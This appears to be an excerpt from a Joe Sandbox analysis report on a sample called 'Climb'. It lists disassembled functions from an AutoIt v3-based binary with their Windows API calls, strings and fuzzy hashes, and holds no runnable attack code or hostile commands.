
Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 5c12df827297d03e5937252bed10d4c4a2c4c3ece6ac31a03c0efbf4094487bf
Instruction ID: 59de5a4ddeb28bb78f7af10bad34bde2c739d56b26eec193d119ccad54b12334
Opcode Fuzzy Hash: 5c12df827297d03e5937252bed10d4c4a2c4c3ece6ac31a03c0efbf4094487bf
Instruction Fuzzy Hash: 61214F78D00314ABDB119FA5ED65A997FF4FB0C754F00401AFA04A6AA0C7B906C4CF90

Function 00130FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00131019
inet_addr.WSOCK32(?), ref: 00131079
gethostbyname.WS2_32(?), ref: 00131085
IcmpCreateFile.IPHLPAPI ref: 00131093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00131123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00131142
IcmpCloseHandle.IPHLPAPI(?), ref: 00131216
WSACleanup.WSOCK32 ref: 0013121C

Strings

Ping, xrefs: 001310D3

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: b6e85f4bf1b317af7eabd9ce2e22e3e98692739b5d450cbcd51a9c2e8557deeb
Instruction ID: 85b3ddb3d8f7896828c84d05ccd765ffe0371de5e10331ea40511f8e844f4f7d
Opcode Fuzzy Hash: b6e85f4bf1b317af7eabd9ce2e22e3e98692739b5d450cbcd51a9c2e8557deeb
Instruction Fuzzy Hash: 5291DE35604201AFD720DF25C888F5ABBE0FF48318F1885A9F5698B7A2C730ED81CB91

Function 000B370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,000B3709,?,?), ref: 000B3777
KillTimer.USER32(?,00000001,?,?,?,?,?,000B3709,?,?), ref: 000B37A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000B37C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,000B3709,?,?), ref: 000B37D1
CreatePopupMenu.USER32 ref: 000B37E5
PostQuitMessage.USER32(00000000), ref: 000B3806

Strings

TaskbarCreated, xrefs: 000B37CC

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 2c24fd08f305c4b39c1052e892a50206e221bc6d02372324a09d20dc7e6fa1ae
Instruction ID: 838b281d5ced889d65a222eedb624fa303c1025404623b3396107909cdd19cb6
Opcode Fuzzy Hash: 2c24fd08f305c4b39c1052e892a50206e221bc6d02372324a09d20dc7e6fa1ae
Instruction Fuzzy Hash: 2F4125F4288244BBDB352B38DD5EBFD3AE5EB09304F200125F901965A1DF749B849761

Function 000E90C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 110d77bff30daa7cf685a38d535eb09b1c1bc2dd1fc3ec2b022a497f87cf53de
Instruction ID: f8f157b76f6bc66fb3230d3d0d9793dca464a4c258d81c0a8914bbd533ec950a
Opcode Fuzzy Hash: 110d77bff30daa7cf685a38d535eb09b1c1bc2dd1fc3ec2b022a497f87cf53de
Instruction Fuzzy Hash: A4C1E3B1904389AFDF11DFAAD841BADBBF4AF09310F144099E555BB3E2C7309A42CB61

Function 000CAC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d1r0,2, xrefs: 000CACA9
d5m0, xrefs: 000CAE75
d1b, xrefs: 000CAD55, 000CAE8E
d0b, xrefs: 000CAC96, 000CAD10, 000CAEA7
d10m0, xrefs: 000CACF0
i, xrefs: 000CB0A3

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID:
String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
API String ID: 0-4285391669
Opcode ID: c1a7325117478ca48cc780965aab4e19cfbb0a22e3dcbf9538233a9dfdc281e8
Instruction ID: 92a7679716f34351f3a00b1bfa1d82bdaaa2ec2cd96e98242cfa53fb3992042e
Opcode Fuzzy Hash: c1a7325117478ca48cc780965aab4e19cfbb0a22e3dcbf9538233a9dfdc281e8
Instruction Fuzzy Hash: 11622970608341CFC724DF14C195AAABBE1BF89308F14895EE8D99B3A2DB71D945CF92

Function 000B35B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000B35E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000B3602
ShowWindow.USER32(00000000,?,?,?,?,?,?,000B3368,?), ref: 000B3616
ShowWindow.USER32(00000000,?,?,?,?,?,?,000B3368,?), ref: 000B361F

Strings

edit, xrefs: 000B35FC
AutoIt v3, xrefs: 000B35D9, 000B35DE, 000B35DF

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: ee860913b9ce120ed7b0a86a548ee8a5531c911ceee8f58cad55a1401e1d7761
Instruction ID: bb7f13ffff5003c81e42ffb00aecdf1b0f5d33aaab6cda9ed668f89806ec6aa2
Opcode Fuzzy Hash: ee860913b9ce120ed7b0a86a548ee8a5531c911ceee8f58cad55a1401e1d7761
Instruction Fuzzy Hash: D1F0B7756402947AEB2257176C18E373EBDE7CAF54B10001AFD04A7570D6B91991DBB0

Function 000B61A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000F5287

Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 000B6299

Strings

AutoIt - , xrefs: 000B620D
Line %d: , xrefs: 000F5305

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: e399a20f8c8663bb1ad5a26cfab3414176c6f6d853084898ce87321b143a953d
Instruction ID: 51b0bf0355bff219d2118e006168e46208a99b969b43d4e85c5a75b5052ec0fd
Opcode Fuzzy Hash: e399a20f8c8663bb1ad5a26cfab3414176c6f6d853084898ce87321b143a953d
Instruction Fuzzy Hash: F241C9714083046BD711EB60DC55FEF77ECAF99310F00462EF999821A2EF759689C792

Function 000B58CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,000B58BE,SwapMouseButtons,00000004,?), ref: 000B58EF
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,000B58BE,SwapMouseButtons,00000004,?), ref: 000B5910
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,000B58BE,SwapMouseButtons,00000004,?), ref: 000B5932

Strings

Control Panel\Mouse, xrefs: 000B58ED

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 1dc4da322387f5f69d1a6ff44ac337855e4c41d9988131a4eb18dbe37d7f6691
Instruction ID: 2cf2d16aa1a14838be0db110ebf64fcebf9da609d44ea58bf676d535cb95a29b
Opcode Fuzzy Hash: 1dc4da322387f5f69d1a6ff44ac337855e4c41d9988131a4eb18dbe37d7f6691
Instruction Fuzzy Hash: 891179B5610618FFDF218F64DC84EEEBBB8EF01761F1084A9F801E7220E2319E419B64

Function 000BF6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 001048C6

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 8d564d9cd64b10eec7f7f2b0dba8d8c1647f66ee113f36631ce838f51018562a
Instruction ID: e0c1196427b1a8d49d61e40a5288a2305a4ad56ef7e66b0d5ee4ad71502e23ad
Opcode Fuzzy Hash: 8d564d9cd64b10eec7f7f2b0dba8d8c1647f66ee113f36631ce838f51018562a
Instruction Fuzzy Hash: 15C258B5A00216DFCB24CF98C880BBDB7F1BF18710F24816AE955AB392D775AD41CB91

Function 000C0340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 000C15F2

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 744389f565bbe87200b85b40d65efaa0998c2034069a0232ff0077837e2abafc
Instruction ID: 781f68576819d3e83ca73bea4cf67e4b080a98f66d1f66745fce6773181908bb
Opcode Fuzzy Hash: 744389f565bbe87200b85b40d65efaa0998c2034069a0232ff0077837e2abafc
Instruction Fuzzy Hash: 5BB26974A08341CFDB64CF18C480B6EB7E1BB99704F24495DE9998B392D771EE81CB92

Function 000D014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 000D09D8

Part of subcall function 000D3614: RaiseException.KERNEL32(?,?,?,000D09FA,?,00000000,?,?,?,?,?,?,000D09FA,00000000,00179758,00000000), ref: 000D3674

__CxxThrowException@8.LIBVCRUNTIME ref: 000D09F5

Strings

Unknown exception, xrefs: 000D0A02

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 669ea6fdb002ec1dc45de603e5e5087ff63ce4f893f93b702f30a6640f8aa9ab
Instruction ID: 3abef7b4a46272f26f43548413a44202f1c80e74053309388cfe96a8d9e87de7
Opcode Fuzzy Hash: 669ea6fdb002ec1dc45de603e5e5087ff63ce4f893f93b702f30a6640f8aa9ab
Instruction Fuzzy Hash: 32F0A43490030DB6CB14BAA8DC56ADEB7BC5B00350F608123B91C96797EB70E659C5B1

Function 001389B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00138D52
TerminateProcess.KERNEL32(00000000), ref: 00138D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00138F3A

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: b77ffaf52c1da69be34f93faf63092fa06cac2895c58ac052bb3bf17c2d3b975
Instruction ID: dbf32f522861eda11b6db0702d2fa16bc869624893c7519c5fc760907bd0568e
Opcode Fuzzy Hash: b77ffaf52c1da69be34f93faf63092fa06cac2895c58ac052bb3bf17c2d3b975
Instruction Fuzzy Hash: DB127B71A083419FC714CF28C484B6ABBE5FF88318F14895DF8899B292DB71ED45CB92

Function 00139AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00139B87
_strcat.LIBCMT ref: 00139BC6
_wcslen.LIBCMT ref: 00139C14

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: 542cd78d136c76acb2141a6ea1189992c87a7bc593bb33cab22f7ad8c81ca67e
Instruction ID: 5082c6085a4ca40543b4b8aa6be707ba2ed4b5b53fc8a8b37917cc0965629989
Opcode Fuzzy Hash: 542cd78d136c76acb2141a6ea1189992c87a7bc593bb33cab22f7ad8c81ca67e
Instruction Fuzzy Hash: DCA15B31604605EFCB18DF18D5D29A9BBA1FF55314F2084AEE84A8F392DB71ED45CB80

Function 000B2793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 000B327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000B32AF
Part of subcall function 000B327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 000B32B7
Part of subcall function 000B327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000B32C2
Part of subcall function 000B327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000B32CD
Part of subcall function 000B327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 000B32D5
Part of subcall function 000B327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 000B32DD

Part of subcall function 000B3205: RegisterWindowMessageW.USER32(00000004,?,000B2964), ref: 000B325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000B2A0A
OleInitialize.OLE32 ref: 000B2A28
CloseHandle.KERNEL32(00000000,00000000), ref: 000F3A0D

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: d5c69ba015abd7f8a60917a952097a8f614d5559e92d8f5f3c9f016a1fefd150
Instruction ID: a7a86747df47b3ce7edc60f1c8cd938070947392071a1c65c8df7eb6fb60aad1
Opcode Fuzzy Hash: d5c69ba015abd7f8a60917a952097a8f614d5559e92d8f5f3c9f016a1fefd150
Instruction Fuzzy Hash: F6717CB0A912018FCB8AEF79FE696953BE4FB59304350412AE409D7A72EB7047C1CF65

Function 000CFCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 000B61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 000B6299

KillTimer.USER32(?,00000001,?,?), ref: 000CFD36
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000CFD45
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0010FE33

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: e479cca6fc064e5f87373c11f9638b6823b335633daab29b51dec680c3b3c549
Instruction ID: 23b8042a3bd60a2cb87c0d882591fb845364493a526cebe0613fcb82a31d8ad7
Opcode Fuzzy Hash: e479cca6fc064e5f87373c11f9638b6823b335633daab29b51dec680c3b3c549
Instruction Fuzzy Hash: 6731C871904344AFDB72CF24D855BEABBEDAB02308F00049ED6DA57282C3741A85CB51

Function 000E8A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,000E894C,?,00179CE8,0000000C), ref: 000E8A84
GetLastError.KERNEL32(?,000E894C,?,00179CE8,0000000C), ref: 000E8A8E
__dosmaperr.LIBCMT ref: 000E8AB9

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: b7a4d09b1c2074c8006a2bdc3a8ece765968a146bfa35a60c58bdcb40cc713cb
Instruction ID: 99cea52cbf0a296316ea59258f5cbcfda365d6c2aa50adbad0f6ca04265c9c30
Opcode Fuzzy Hash: b7a4d09b1c2074c8006a2bdc3a8ece765968a146bfa35a60c58bdcb40cc713cb
Instruction Fuzzy Hash: 570148326051E01EE6606336BC457BE67894B82738F2D452BF91CBB1D3DF7089C15392

Function 000E970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,000E97BA,FF8BC369,00000000,00000002,00000000), ref: 000E9744
GetLastError.KERNEL32(?,000E97BA,FF8BC369,00000000,00000002,00000000,?,000E5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,000D6F41), ref: 000E974E
__dosmaperr.LIBCMT ref: 000E9755

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 40ed226bc4cca54626a80a48c8f4f0571e251234ef26ad9bc79011b00486f74a
Instruction ID: 3142366d8146448edce39ebf1b7a61c38c4a84831415719f143ef24aa104688e
Opcode Fuzzy Hash: 40ed226bc4cca54626a80a48c8f4f0571e251234ef26ad9bc79011b00486f74a
Instruction Fuzzy Hash: 6D014C37624655AFCF159F9AEC05CAE3B69EB85730B240209FC51AB290EA30DD41DBA0

Function 000BF238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 000BF27B
DispatchMessageW.USER32(?), ref: 000BF289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000BF29F
Sleep.KERNEL32(0000000A), ref: 000BF2B1
TranslateAcceleratorW.USER32(?,?,?), ref: 001032D8

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

